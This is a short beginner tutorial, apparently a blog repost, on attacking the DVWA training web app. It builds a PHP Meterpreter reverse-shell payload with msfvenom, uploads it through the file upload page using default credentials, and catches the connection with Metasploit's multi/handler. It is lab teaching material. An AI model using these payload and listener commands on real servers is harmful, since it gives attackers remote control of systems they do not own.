Open your kali linux terminal and type
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.140 lport=4444 -f raw
It will generate a raw code of php file
Now copy the generated code in the text file and save it on your desktop with .php extension
Now open the DVWA Webapp in your server and login with following credentials:
Username – admin
Password – password
Now scroll to the File Upload section in left pane and upload the above created php file
When you will finish uploading your php file, it will show you the path
Now open your uploaded file in browser
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.140
set lport 4444
exploit
Now you can access the victim’s server
The post Web Server Penetration Testing with DVWA and Metasploit (Beginner Guide) appeared first on Hacking Articles.